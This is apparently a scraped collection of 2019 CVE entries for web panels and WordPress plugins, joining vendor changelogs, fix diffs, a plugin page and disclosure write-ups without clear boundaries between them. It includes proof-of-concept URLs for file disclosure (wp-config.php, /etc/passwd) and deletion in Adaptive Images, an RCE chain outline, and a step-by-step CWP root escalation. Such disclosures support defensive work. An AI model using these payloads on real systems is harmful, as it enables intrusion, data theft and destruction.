In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.840, File and Directory Information Exposure in filemanager allows attackers to enumerate users and check for active users of the application by reading /tmp/login.log.

**New Version (coming soon)**  
_Now in 2019, we release new version multiple times a week and sometimes even multiple times per day._

**Version 0.9.8.651 – 0.9.8.747 (released 21/05/2018-09/12/2018 )**

Security  
– **\[New Feature\]** Implementation of anti XSS token for the GUI

New WebServers  
– **\[New Feature\]** Define per domain webservers, now you can use different webservers per domain  
– **\[New Feature\]** prepared for AI-Robot so Artificial Intelligence can take over the control on it  
– **\[New Feature\]** Define global default server vhost templates for apache/nginx/varnish/php-fpm  
– **\[New Feature\]** Define per domain vhost templates for apache/nginx/varnish/php-fpm  
– **\[New Feature\]** Error detection in vhost build for apache/nginx/varnish/php-fpm  
– **\[UPDATE\]** latest versions of the webservers apache/nginx/varnish  
– **\[UPDATE\]** AutoSSL: more stable domain validation check

New Varnish  
– **\[New Feature\]** Varnish makes your site look like static html, it doesn’t need to run php-cgi/php-fpm for each request.  
– **\[New Feature\]** Website continues to work as cached even if apache is down  
– **\[New Feature\]** more advanced templates with better cache in memory  
– **\[New Feature\]** per domain templates and configs which you can modify and build your own  
– **\[New Feature\]** it can run now as a cache server in front of Tomcat,nodejs,ruby…

AI-Robot (Artificial Intelligence for cwp)  
Artificial intelligence integration, we have integrated “AI-Robot” artificial intelligence system which has started to learn system issues and soon it will be able to handle errors and automatically recover the system services.

PHP/PHP-FPM  
– **\[New Feature\]** PHP-FPM default setup with cache and with fastest unix sockets  
– **\[New Feature\]** PHP Pecl Manager for all PHP builders  
– **\[New Feature\]** PHP-FPM Selector with many custom options (automatic install of dependencies)  
– **\[New Feature\]** Predefined vhost templates for better performances  
– **\[New Feature\]** Custom templates for php-fpm, you can use custom per domain  
– **\[UPDATE\]** latest versions of the PHP  
– **\[UPDATE\]** New PHP 7.3.0, please use only for beta testing  
– **\[UPDATE\]** for all php builders automatic detection if build is already running  
– **\[UPDATE\]** PHP Selector with many versions and options (automatic install of dependencies)

Other Modules  
– **\[New Feature\]** New DNS Zone Editor with error detection and now much more advanced  
– **\[New Feature\]** New Mod Security Manager  
– **\[New Feature\]** Automatic update manager for 3rdParty scripts like, roundcube, phpmyadmin…  
– **\[New Feature\]** User notifications  
– **\[UPDATE\]** Improved cwp to cwp migration tool, we are still working on it to make it even better  
– **\[UPDATE\]** MySQL Manager: edit user password

**User Panel \[New Design\]**  
– **\[SECURITY\]** Implementation of anti XSS token for the GUI  
– **\[New Feature\]** New Advanced File Manager  
– **\[New Feature\]** New Modern Design  
– **\[New Feature\]** Search integration for menu and icons  
– **\[New Feature\]** Sound alerts  
– **\[New Feature\]** Pagination for all modules  
– **\[New Feature\]** Advanced editor integration for php.ini  
– **\[UPDATE\]** Cron Manager error detection  
\* We have also fixed many other reported bugs

**Version 0.9.8.448 – 0.9.8.651 (released 08/02/2018-21/05/2018)**  
– **\[New Feature\]** cgroups for centos 7 (limit resource per user, eg. set cpu limit to 50%)  
– **\[New Feature\]** Main left menu search option  
– **\[New Feature\]** Manage User crons from the admin panel  
– **\[New Feature\]** New Notifications handler with email alerts  
– **\[New Feature\]** New Ulimits Module -Show all user processes and limits (good for debugging)  
– **\[New Feature\]** Monit Monitoring (advanced tool for monitoring server services and resources)  
– **\[New Feature\]** MySQL Manager now has security and optimization tests integrated  
– **\[New Feature\]** Security Tools – Maldet Scan – Scan websites for malware  
– **\[New Feature\]** Security Tools – RKHunter Scan – Scan server for rootkits, backdoors  
– **\[New Feature\]** Security Tools – Lynis Scan – Scan server for system hardening  
– **\[New Feature\]** Security Tools – Symlink scan – Scan user accounts for symlinks  
– **\[UPDATE\]** New SSL Manager with additional auto-download for chain certificates  
– **\[UPDATE\]** Latest PHP versions (used in switcher/selector)  
– **\[UPDATE\]** Apache latest version rpm + rebuilder/compiler  
– **\[UPDATE\]** New Security checks in the Security Advisor via new notifications  
– **\[BUGFIX\]** Fixed all reported bugs with the cpanel account migration  
– **\[BUGFIX\]** Fixed bugs in the account transfer tool  
– **\[BUGFIX\]** Fixed bugs in the Mail server manager related to rebuild  
– **\[BUGFIX\]** Fixed bugs with API

**User Panel \[\]**  
– **\[SECURITY\]** Big security update for user panel, many issues have been resolved  
– **\[New Feature\]** AutoSSL- Install/remove Free SSL from the user panel  
– **\[UPDATE\]** Improved DNS zone editor

\* We have also fixed many other reported bugs

**Version 0.9.8.359 – 0.9.8.448** (released 29/09/2017-07/02/2018)  
– **\[UPDATE\]** PHP 7.2  
– **\[UPDATE\]** New admin panel design upgrade  
– **\[New Feature\]** Theme manager for User Panel  
– **\[New Feature\]** Language manager for User Panel  
– **\[New Feature\]** New cPanel migration tool running in background  
– **\[New Feature\]** New CWP to CWP migration tool  
– **\[New Feature\]** New Advanced Backup Manager  
– **\[New Feature\]** New Advanced API Manager with permissions

**New user Panel** (demo)  
– **\[New Feature\]** All new, too many things to have them listed here, you simply need to check it!  
Fixed many many other reported bugs

**Version 0.9.8.334 – 0.9.8.359** (released 26/06-29/09/2017)  
– **\[UPDATE\]** Added Apache 2.4.26, 2.4.27  
– **\[UPDATE\]** PHP 5.6.31, 7.0.21, 7.0.22, 7.0.23, 7.0.24, 7.1.6, 7.1.7, 7.1.9, 7.1.10  
– **\[UPDATE\]** PHP selector delete unwanted php version with single click  
– **\[UPDATE\]** AutoSSL: manualy start and force auto renewal  
– **\[New Feature\]** Included manager for new user panel compatibility

– **\[BUGFIX\]** IonCube installer fixed issue with php 7.0 & 7.1  
– **\[BUGFIX\]** Zendguard loader5.5, 5.6 improved installer  
– **\[BUGFIX\]** AutoSSL reported bugs fixed  
– **\[BUGFIX\]** Improved security  
Fixed many other reported bugs

**Version 0.9.8.315 – 0.9.8.333** (released 28/04-25/06/2017)  
– **\[UPDATE\]** detailed cleanup of removed accounts  
– **\[UPDATE\]** yum manager improvement  
– **\[UPDATE\]** New PHP versions added 7.0.20 and 7.1.5  
– **\[UPDATE\]** php selector new versions of php  
– **\[UPDATE\]** apache 2.4.26 (has security updates)  
– **\[New Feature\]** new ftp manager for admin  
– **\[New Feature\]** bandwidth monitor (incoming/outgoing for all interfaces)

– **\[BUGFIX\]** php switcher bug fix  
– **\[BUGFIX\]** autossl bugfix  
– **\[BUGFIX\]** mod security installer bug fix  
– **\[BUGFIX\]** vhost rebuild bug fix  
– **\[BUGFIX\]** mail queue module bug fix  
– **\[BUGFIX\]** mail explorer module bug fix  
Fixed many other reported bugs

**Version 0.9.8.291 – 0.9.8.314** (released 23/03-28/04/2017)  
– **\[UPDATE\]** New PHP versions added 7.0.18 and 7.1.4  
– **\[UPDATE\]** Improved SSL Manager (fixed autoSSL bugs)  
– **\[UPDATE\]** Improved backups (now weekly and monthly use hard links and can reduce total backup size up to 65%)  
– **\[New Feature\]** Ajax disk usage checker (check your disk space usage per folder)  
– **\[New Feature\]** New Varnish configuration editor  
– **\[New CWPpro\]** Yum Package and Repository Manager  
– **\[SECURITY\]** SECURITY BUG FIXED  
Prevention of Cross-site Scripting (XSS) Attack ​by Esmaeil Rahimian (Security Research from SecureHost) Rahimian@securehost.co  
Fixed many other reported bugs

**Version 0.9.8.266 – 0.9.8.290** (released 01-22/03/2017)  
– **\[BUGFIX\]** ioncube update scripts  
– **\[BUGFIX\]** sysstat graph errors  
– **\[BUGFIX\]** PHP Selector fixed php 7  
– **\[BUGFIX\]** Advanced File Manager bugs  
– **\[BUGFIX\]** Mail Server rebuild  
– **\[BUGFIX\]** SSL redirection for cwp services  
– **\[BUGFIX\]** Fixed security advisor multiple messages  
– **\[UPDATE\]** Php Switcher new additional modules and new php versions  
– **\[UPDATE\]** PHP Selector update of all php versions and added php 7.0, 7.1  
– **\[UPDATE\]** SSL Cert Manager now with more detailed info from the certificate files  
– **\[New Feature\]** AutoSSL option when creating new account, domain or subdomain from admin panel  
– **\[New Feature\]** AutoSSL for Hostname  
– **\[New Feature\]** Nice and Fast Ajax upgrade for list accounts, domains and subdomains.  
– **\[New Feature\]** New Varnish configuration editor  
– **\[CWPpro\]** Yum, number of available packages upgrades at login into cwp

**Version 0.9.8.250 – 0.9.8.265** (released 21-28/02/2017)  
– **\[New Feature\]** Sysstat graphs  
– **\[UPDATE\]** Higher grade for apache SSL  
– **\[UPDATE\]** PHP Switcher\_v2 Configuration Upgrade and Bugs Fixed  
– **\[BUGFIX\]** File Manager bug fixed, and few smaller bug in the gui

**Version 0.9.8.248 – 0.9.8.249** (released 21/02/2017)  
– **\[UPDATE\]** PHP Switcher added extensions: intl, pspell, tidy, wddx  
– **\[BUGFIX\]** Fixed several bugs

**Version 0.9.8.240 – 0.9.8.247** (released 17/02/2017)  
– **\[New Feature\]** NEW friendly PHP Version Switcher with many addons and more to come…  
– **\[UPDATE\]** Update of PHP versions: 7.1.2, 7.0.16, 5.6.30  
– **\[Old Removed\]** Old PHP Version Switcher removed from the left menu but still exists.  
– **\[BUGFIX\]** Fixed several bugs

**Version 0.9.8.239** (released 13/02/2017)  
– **\[BUGFIX\]** Fixed bug with softaculous remove mysql user.

**Version 0.9.8.237 & 0.9.8.238** (released 11/02/2017)  
– **\[New Feature\]** LiteSpeed Enterprise integration with CWP

**13/02/2017**  
…we were working very hard to make CWP work with CentOS 7 so we have done many changes are unfortunately there is no any info what was done before in which version.

CVE-2019-13385: ChangeLog for CentOS 7 | Control Web Panel

WebAppick WooCommerce Product Feed 2.2.18 and earlier is affected by: Cross Site Scripting (XSS). The impact is: XSS to RCE via editing theme files in WordPress. The component is: admin/partials/woo-feed-manage-list.php:63. The attack vector is: Administrator must be logged in.

CVE-2019-1010124

An Arbitrary File Deletion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to delete arbitrary files via the $REQUEST['adaptive-images-settings'] parameter in adaptive-images-script.php.

**LFI (Local file inclusion), Arbitrary file deletion and RCE in Adaptive Images for WordPress plugin.**

This plugin, developed by Nevma is used to serve images in Wordpress based on device resolution, allowing an on-the-fly resize. It is useful to decrease the page load for mobile devices.

The analyzed version is **0.6.66** on a fresh WordPress installation 5.2.2.

Due to an exposed variable an unauthenticated attacker can exploit a vulnerability that can lead to a LFI (Local File Inclusion) and to Arbitrary File Deletion.

Sensible system and Wordpress file can be easily exfiltrated and the two vulnerabilities can be used to obtain RCE (Remote Command Execution).

****INTRO****

**Adaptive Images for WordPress** serves images through a PHP script, adaptive-images-script.php.

All requests made to image assets that appear in specific folders (the plugin settings allow to change these folders) are redirected through this script that eventually manipulate the image before serving it.

At **line 877** the plugin settings are collected:

      $settings = adaptive_images_script_get_settings();
    

This method at **line 62** checks if the $_REQUEST['adaptive-images-settings'] is present and if not it overrides and composes it according the default configuration.

    
        function adaptive_images_script_get_settings () {
    
            // Setup script settings.
    
            if ( ! isset( $_REQUEST['adaptive-images-settings'] ) ) {
    
        ...
    
        // Setup script settings and save the in request scope.
    
        $_REQUEST['adaptive-images-settings'] = array(
            'debug'          => $debug,
            'resolutions'    => $resolutions,
            'cache_dir'      => $cache_dir,
            'jpg_quality'    => $jpg_quality,
            'png8'           => $png8,
            'sharpen'        => $sharpen,
            'watch_cache'    => $watch_cache,
            'browser_cache'  => $browser_cache,
            'request_uri'    => $request_uri,
            'source_file'    => $source_file,
            'wp_content'     => $wp_content_dir,
            'client_width'   => $client_width,
            'hidpi'          => $hidpi,
            'pixel_density'  => $pixel_density,
            'resolution'     => $resolution
        );
    

At the end of the method the function simply return the $_REQUEST['adaptive-images-settings'] variable.

      return $_REQUEST['adaptive-images-settings'];
    

This logic allows any visitor to set and override the $_REQUEST['adaptive-images-settings'] just passing it to the request.

**Having control on this variable allows an attacker to exploit two major vulnerabilities.**

The parameter $_REQUEST['adaptive-images-settings']['source_file'] allows an attacker to set in an arbitrary way the file requested that will be served from the script.

Even if it is not possible to manipulate the Content-Type header, the script will generate a malformed image that contains the requested file.

This vulnerability in combination with other server misconfiguration can lead to RCE (Remote Command Execution) using log poisoning technique, /proc/self/environ technique and others.

****POC****

http://wp-vulnerable/wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=../../../wp-config.php

http://wp-vulnerable/wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=/etc/passwd

_The image used to trigger the vulnerability should exist._

****Arbitrary File Deletion****

The plugin contains a cache mechanism that allows the generated resized images to be saved and cached to prevent excessive resources usage.

As every cache mechanism a file should be deleted if the source is newer than the cache file.  
**This feature can be abused to delete an arbitrary file accessible from the Wordpress installation.**

On **line 977** is called the function that removes a stale cache image:

        // Locate cached image.
    
        $cache_file = $settings['wp_content'] . '/' . $settings['cache_dir'] . '/' . $settings['resolution'] . $settings['request_uri'];
    
    
    
        // Check if cached image if stale and relete it if so.
    
        if ( file_exists( $cache_file ) ) {
    
            // Check if cached image is stale and delete it if so.
    
            if ( $settings['watch_cache'] ) {
    
                adaptive_images_delete_stale_cache_image( $settings['source_file'], $cache_file, $settings['resolution'] );
    
            }
    
        }
    

Every variable used in this code is controlled by the aforementioned $_REQUEST['adaptive-images-settings'] variable.

The adaptive_images_delete_stale_cache_image function just checks if the $cache_files exists and if it is newer than the original one.

The only condition to successfully exploit this vulnerability is that the file that we pass as $source_file is newer than the file that we pass as $cache_file.

        function adaptive_images_delete_stale_cache_image ( $source_file, $cache_file, $resolution ) {
    
            if ( file_exists( $cache_file ) ) {
    
                // Check image file timestamp.
    
                if ( filemtime( $cache_file ) >= filemtime( $source_file ) ) {
    
                    return $cache_file;
    
                }
    
                unlink( $cache_file );
            }
    
        }
    

****POC****

Using relative paths we set as $source_file an image (or any other file) that exists in the website and as $cache_file (our target) the wp-config.php.  
In this way it is almost certain that the image is more recent than the target file.

Some other variables should be manipulated to pass some checks and build the correct path of the target file.

_This POC deletes the wp-config.php, test it carefully._

http://wp-vulnerable/wp-content/uploads/2019/07/image.jpeg?adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1

****BONUS: LFI + Arbitrary file deletion = RCE****

Combining the previous two vulnerabilities an attacker can obtain a bold (and not really stealth) Remote Code Execution on the server.

This is the exploit process:

1.  Dump the current wp-config.php
2.  Delete the current wp-config.php
3.  Install a fake WordPress alongside the real one (DB credentials are known, a random db\_prefix should be chosen to not overwrite the current installation).
4.  Log in the fake WordPress to patch a plugin or theme file to set up a backdoor
5.  Use the backdoor to restore the previous wp-config.php and remove the fake WordPress installation from the database.

This process can be automated and executed in less than 1 minute. During the process the website will not be reachable (exploit).

****Time Line****

Date

What

2019/07/08

Vulnerability reported to plugin developer company using the email found in code. No response.

2019/07/11

Vulnerability reported directly to plugin developer.

2019/07/11

The vulnerability was verified by the plugin developer.

2019/07/11

A fix was released in version 0.6.7.

2019/07/19

Public disclosure.

Special thanks to Takis @ Nevma for his availability and for the quick release of the fix.

CVE-2019-14206: Adaptive images for Wordpress 0.6.66: LFI, arbitrary file deletion and RCE.

A SQL injection vulnerability exists in WPEverest Everest Forms plugin for WordPress through 1.4.9. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system via includes/evf-entry-functions.php

@@ -75,55 +75,45 @@ function evf\_search\_entries( $args ) { ) );  
$statuses = array\_keys( evf\_get\_entry\_statuses() ); $valid\_fields = array( 'date', 'form\_id', 'title', 'status' );  
// Check if form ID is valid for entries. if ( ! array\_key\_exists( $args\['form\_id'\], evf\_get\_all\_forms() ) ) { return array(); }  
$orderby = isset( $args\['orderby'\] ) ? sanitize\_key( $args\['orderby'\] ) : 'entry\_id'; $order = "ORDER BY {$orderby} " . esc\_sql( strtoupper( $args\['order'\] ) ); $limit = -1 < $args\['limit'\] ? $wpdb\->prepare( 'LIMIT %d', $args\['limit'\] ) : ''; $offset = 0 < $args\['offset'\] ? $wpdb\->prepare( 'OFFSET %d', $args\['offset'\] ) : ''; $status = ! empty( $args\['status'\] ) ? "AND \`status\` = '" . sanitize\_key( $args\['status'\] ) . "'" : ''; $search = ! empty( $args\['search'\] ) ? "AND \`meta\_value\` LIKE '%" . $wpdb\->esc\_like( sanitize\_text\_field( $args\['search'\] ) ) . "%'" : ''; $include = ! empty( $args\['form\_id'\] ) ? "AND \`form\_id\` = '" . absint( $args\['form\_id'\] ) . "'" : ''; $exclude = ''; $date\_created = ''; $date\_modified = '';  
if ( ! empty( $args\['after'\] ) || ! empty( $args\['before'\] ) ) { $args\['after'\] = empty( $args\['after'\] ) ? '0000-00-00' : $args\['after'\]; $args\['before'\] = empty( $args\['before'\] ) ? current\_time( 'mysql', 1 ) : $args\['before'\];  
$date\_created = "AND \`date\_created\_gmt\` BETWEEN STR\_TO\_DATE('" . esc\_sql( $args\['after'\] ) . "', '%Y-%m-%d %H:%i:%s') and STR\_TO\_DATE('" . esc\_sql( $args\['before'\] ) . "', '%Y-%m-%d %H:%i:%s')"; $query = array(); $query\[\] = "SELECT DISTINCT {$wpdb\->prefix}evf\_entries.entry\_id FROM {$wpdb\->prefix}evf\_entries INNER JOIN {$wpdb\->prefix}evf\_entrymeta WHERE {$wpdb\->prefix}evf\_entries.entry\_id = {$wpdb\->prefix}evf\_entrymeta.entry\_id";  
if ( ! empty( $args\['search'\] ) ) { $like = '%' . $wpdb\->esc\_like( $args\['search'\] ) . '%'; $query\[\] = $wpdb\->prepare( 'AND meta\_value LIKE %s', $like ); }  
if ( ! empty( $args\['modified\_after'\] ) || ! empty( $args\['modified\_before'\] ) ) { $args\['modified\_after'\] = empty( $args\['modified\_after'\] ) ? '0000-00-00' : $args\['modified\_after'\]; $args\['modified\_before'\] = empty( $args\['modified\_before'\] ) ? current\_time( 'mysql', 1 ) : $args\['modified\_before'\]; if ( ! empty( $args\['form\_id'\] ) ) { $query\[\] = $wpdb\->prepare( 'AND form\_id = %d', absint( $args\['form\_id'\] ) ); }  
$date\_modified = "AND \`date\_modified\_gmt\` BETWEEN STR\_TO\_DATE('" . esc\_sql( $args\['modified\_after'\] ) . "', '%Y-%m-%d %H:%i:%s') and STR\_TO\_DATE('" . esc\_sql( $args\['modified\_before'\] ) . "', '%Y-%m-%d %H:%i:%s')"; if ( ! empty( $args\['status'\] ) ) { $query\[\] = $wpdb\->prepare( 'AND \`status\` = %s', isset( $statuses\[ $args\['status'\] \] ) ? $statuses\[ $args\['status'\] \] : 'publish' ); }  
$query = trim( " SELECT DISTINCT {$wpdb\->prefix}evf\_entries.entry\_id FROM {$wpdb\->prefix}evf\_entries INNER JOIN {$wpdb\->prefix}evf\_entrymeta WHERE {$wpdb\->prefix}evf\_entries.entry\_id = {$wpdb\->prefix}evf\_entrymeta.entry\_id {$status} {$search} {$include} {$exclude} {$date\_created} {$date\_modified} {$order} {$limit} {$offset} " ); $orderby = in\_array( $args\['orderby'\], $valid\_fields, true ) ? $args\['orderby'\] : 'entry\_id'; $order = 'DESC' === strtoupper( $args\['order'\] ) ? 'DESC' : 'ASC'; $orderby\_sql = sanitize\_sql\_orderby( "{$orderby} {$order}" ); $query\[\] = "ORDER BY {$orderby\_sql}";  
if ( -1 < $args\['limit'\] ) { $query\[\] = $wpdb\->prepare( 'LIMIT %d', absint( $args\['limit'\] ) ); }  
if ( 0 < $args\['offset'\] ) { $query\[\] = $wpdb\->prepare( 'LIMIT %d', absint( $args\['offset'\] ) ); }  
$results = $wpdb\->get\_results( $query ); // WPCS: cache ok, DB call ok, unprepared SQL ok. // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared $results = $wpdb\->get\_results( implode( ' ', $query ), ARRAY\_A );  
$ids = wp\_list\_pluck( $results, 'entry\_id' );

CVE-2019-13575: Fix - Security issue reported by Tin Duong on entries SQL query · wpeverest/everest-forms@755d095

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.836, a cwpsrv-xxx cookie allows a normal user to craft and upload a session file to the /tmp directory, and use it to become the root user.

**Information**

    Product             : CWP Control Web Panel
    Vulnerability Name  : Root Privilege Escalation
    version             : 0.9.8.836
    Fixed on            : 0.9.8.840
    Test on             : CentOS 7.6.1810 (Core)
    Reference           : http://centos-webpanel.com/
                        : https://control-webpanel.com/changelog
    CVE-Number          : CVE-2019-13359
    

  
**Description**

The vulnerability allows low privilege users to escalate themself to become a root user by crafting a session file from testing environment and upload to the target server at /tmp directory

  
**State 1 Session prepareation (Testing Environment)**

1.  Check the current IP address of attacker

  

2.  Set the IP address on testing environment network

  

3.  Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx)

  

4.  Copy the content of session file (/tmp/sess\_xxxxxxxxxxxxxx) to a new file "sess\_123456" # we need "rkey"

  

5.  Save the token value from the session file (cwp\_24a7ebcfc91fc0817cc8961b115c8cd0)

**State 2 Attack the target**

6.  On the real target, login as a normal user on port 2083 and upload file "sess\_123456" to /tmp directory

Login

Upload sess\_123456 file

Intercept the request

Modify the parameter "fm\_current\_dir" value to "/tmp/"

Upload successfully

  

7.  On another browser, replace the token value in the URL https://\[target.com\]:2031/cwp\_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php and create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess\_123456)

  

8.  Refresh browser and got root

Root panel

Check the file sess\_123456

Web console

\*From step 6 - 8, we need to complete it quickly. if we do it too slow, the application will change the permission of file sess\_123456 to 600 and the file will become 0 byte. If this happened, we need to change session file name and repeat the steps again. To avoid the problem, set crontab and execute it

    * * * * * chmod 664 /tmp/sess_123456" 
    

**Timeline**

    2019-06-30: Discovered the bug
    2019-06-30: Reported to vendor
    2019-06-30: Vender accepted the vulnerability
    2019-07-02: The vulnerability has been fixed
    2019-07-06: Published
    

  
**Discovered by**

    Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak

CVE-2019-13359: CentOS-Control-Web-Panel-CVE/CVE-2019-13359.md at master · i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

A use-after-free in onig_new_deluxe() in regext.c in Oniguruma 6.9.2 allows attackers to potentially cause information disclosure, denial of service, or possibly code execution by providing a crafted regular expression. The attacker provides a pair of a regex pattern and a string, with a multi-byte encoding that gets handled by onig_new_deluxe(). Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust.

@@ -29,6 +29,7 @@

  

#include "regint.h"

  

#if 0

static void

conv\_ext0be32(const UChar\* s, const UChar\* end, UChar\* conv)

{

@@ -158,6 +159,7 @@ conv\_encoding(OnigEncoding from, OnigEncoding to, const UChar\* s, const UChar\* e

  

return ONIGERR\_NOT\_SUPPORTED\_ENCODING\_COMBINATION;

}

#endif

  

extern int

onig\_new\_deluxe(regex\_t\*\* reg, const UChar\* pattern, const UChar\* pattern\_end,

@@ -169,9 +171,7 @@ onig\_new\_deluxe(regex\_t\*\* reg, const UChar\* pattern, const UChar\* pattern\_end,

if (IS\_NOT\_NULL(einfo)) einfo->par = (UChar\* )NULL;

  

if (ci->pattern\_enc != ci->target\_enc) {

r = conv\_encoding(ci->pattern\_enc, ci->target\_enc, pattern, pattern\_end,

&cpat, &cpat\_end);

if (r != 0) return r;

return ONIGERR\_NOT\_SUPPORTED\_ENCODING\_COMBINATION;

}

else {

cpat = (UChar\* )pattern;

CVE-2019-13224: Fix CVE-2019-13224: don't allow different encodings for onig_new_delu… · kkos/oniguruma@0f7f61e

Cross-site scripting vulnerability in Attendance Manager 0.5.6 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Visit The User’s Guide (ja)/(en) for more info.

An administrator can do all users’ attendance management.  
And each user can do attendance management by themselves.

An attendance schedule is displayed by shortcords.  
\* Today’s staff  
\* Weekly schedule  
\* Monthly schedule

管理者は全てのユーザーの出勤管理ができます。  
また、ユーザーも自分自身の出勤管理が可能です。

出勤スケジュールはショートコードで表示されます。  
\* 今日の出勤スタッフ  
\* 週間スケジュール  
\* 月間スケジュール

This plug-in makes several pages and data base tables automatically.  
このプラグインはいくつかのページとデータベーステーブルを自動的に作ります。

**Installation**

1.  Donwload plugin file (“attendance-manager.zip”)  
    プラグインファイル (“attendance-manager.zip”) をダウンロードします。
    
2.  Upload plugin file from Administrator menu “Plugins > Add New > Upload Plugin”.  
    管理画面「プラグイン > 新規追加 > プラグインのアップロード」からプラグインファイルをアップロードします。
    
3.  Activate the plugin.  
    プラグインを有効化します。
    

**Plugin set up**

1.  Open the WordPress admin panel, and go to the plugin option page “Attendance Manager”.  
    管理画面を開き「Attendance Manager」メニューを開きます。
    
2.  Set up option item of some.  
    オプション項目を設定します。
    

**User registration as “staff”**

1.  Register staff of your workplace as user.  
    職場のスタッフをユーザー登録します。
    
2.  When registering user, check “This user is a staff”.  
    登録の際、「このユーザーはスタッフです」をチェックします。
    
3.  In case of the registered user, check “This user is a staff” in a profile edit page of that user.  
    登録済みのユーザーの場合は、そのユーザーのプロフィール編集ページで「このユーザーはスタッフです」をチェックします。
    

**Post each staff’s introduction article**

Post each staff’s introduction article. (For example into a “staff” category etc.)  
And insert short cord \[attmgr\_weekly id=”xx”\] to that article.

*   “id” is ID number of each user in your WordPress.

新たに各スタッフの紹介記事を投稿します。（例えば「スタッフ」カテゴリーなどに）  
その記事に、ショートコード \[attmgr\_weekly id=”xx”\] を挿入します。

*   “id” はあなたのサイトにおける各ユーザーのID番号です。

**Post a staff’s information**

Post each staff’s information article. (For example, into a “staff” category etc.)  
And insert short cord \[attmgr\_weekly id=”xx”\] to that article.  
This short code displays the weekly schedule of this staff.

各スタッフの紹介記事を投稿します。（例えば「スタッフ」カテゴリーなどに）  
その記事に、ショートコード \[attmgr\_weekly id=”xx”\] を挿入します。  
このショートコードは、そのスタッフの週間スケジュールを表示するものです。

*   “id” is ID number of each user in your WordPress.  
    “id” はあなたのサイトにおける各ユーザーのID番号です。

**Attendance management**

*   An administrator does all the user’s attendance management by a scheduler for admin.  
    管理者は管理者用スケジューラから全てのユーザーの出勤管理を行ないます。
    
*   A staff logs in and does the attendance management by a scheduler for a staff.  
    スタッフはログインしてスタッフ専用スケジューラから自身の出勤管理を行ないます。
    

If you encounter some problems, please ask me.  
Visit Trouble shooting (ja) for more info.

**When the number of staff increases, the schedule is not reflected.**

If the number of staff increases too much, the schedule may not be reflected.  
This may be the upper limit of the number of POST items in your PHP.  
In that case increase the value of “max\_input\_vars” in php.ini.  
e.g.)  
max\_input\_vars = 5000

**スタッフ数を増えやしたらスケジュールが反映されなくなりました**

スタッフ数が増えすぎるとスケジュールが反映されないことがあります。  
それは、ご利用環境のPHPでのPOST項目数の上限かもしれません。  
その場合、php.iniの “max\_input\_vars”の値を増やしてみてください。  
例）  
max\_input\_vars = 5000

Unfortunately, I never understood how to use this plugin. It lacks documentation and video tutorials. I followed the ReadMe documentation, yet staff never showed up on admin's end. Sorry to give only 2 stars.

Straightforward, simple plugin. No bells and whistles. If you're for example looking for a very simple tool to keep track of staff presence in the office, this will do it. In these "hybrid" (post-covid) times I find it very useful to be able to see who will be present in the office on which days and hours. Easier than using a shared on-line calendar. I hope the author will continue the development...

great plugin and really helped me a lot! though i hope you find a way for it to display only a specific user role in "Today's Staff" something like this: \[attmgr\_daily role="administrator"\] or \[attmgr\_daily role="accounting\_department"\] to check and see attendance of staff per department instead of the whole staff Also i hope you find a way to get the current user ID and display the weekly attendance of the current user like this: \[attmgr\_weekly id="$current\_user"\] because the only available shortcode the plugin has is the attendance of a specific user: \[attmgr\_weekly id="xx"\] This would save me a lot! Thanks!

This is exactly what I was looking for. The plugin works great and when I ran into small trouble (which was caused by the Theme I was using) the developer responded very quickly when I send a mail. Try this! It works, my client is very happy now.

Read all 5 reviews

“Attendance Manager” is open source software. The following people have contributed to this plugin.

Contributors

*    tnomi

**0.6.0**

*   Fixed a link error with the shortcode \[attmgr\_daily\] when business hours exceed midnight.

**0.5.9**

*   Fixed a shortcode error when editing with the block editor.

**0.5.8**

*   Fixed cURL timeout issue.

**0.5.7**

*   Fixed a vulnerability issue.

**0.5.6**

*   ‘Screen\_icon’ on the admin-page has been deleted. And fixed some PHP ‘Notice’.

**0.5.5**

*   Fixed some notices and warnings displayed in “WP\_DEBUG” mode has been corrected.

**0.5.4**

*   Bug fix in calendar navi.

**0.5.3**

*   Shortcode ‘\[attmgr\_today\_work id=”xx”\]’ is added.
*   The opening hours during midnight will be regarded as “Today”.
*   Bug fix in calendar.

**0.5.2**

*   The link of each staff can be given by “Edit User: Website(user\_url)”.
*   An option to use the user avatar on a staff’s portrait was added.

**0.5.1**

*   An “action” URL of the “Settings” form was changed.
*   Action hook “parse\_request” was changed to “template\_redirect”.
*   These functions were changed, ATTMGR::current\_page(), ATTMGR::current\_user(), ATTMGR\_Form::action(), ATTMGR\_Form::access\_control().

**0.5.0**

*   A “Date/Time Format” was added to the plugin option.  
    Several filter hook were added.
    
    *   ‘attmgr\_date\_format’
    *   ‘attmgr\_month\_format’
    *   ‘attmgr\_time\_format’
    *   ‘attmgr\_time\_format\_editor’
*   The schedule table name is given from a filter.
    
    *   ‘attmgr\_schedule\_table\_name’
*   Several filter hook parameter were changed.
    
    *   ‘attmgr\_shortcode\_staff\_scheduler’
    *   ‘attmgr\_shortcode\_admin\_scheduler’
    *   ‘attmgr\_shortcode\_daily’
    *   ‘attmgr\_shortcode\_weekly’
    *   ‘attmgr\_shortcode\_weekly\_all’
    *   ‘attmgr\_shortcode\_monthly\_all’
*   Bug fix about submit processing in the scheduler.
    
*   Dutch translation (by Kleijheeg-san) was added.
    

**0.4.5**

*   Parameter “guide” was added to short code [attmgr_daily].  
    usage: [attmgr_daily guide="week"]  
    In this case, the link to each date in a week is shown.  
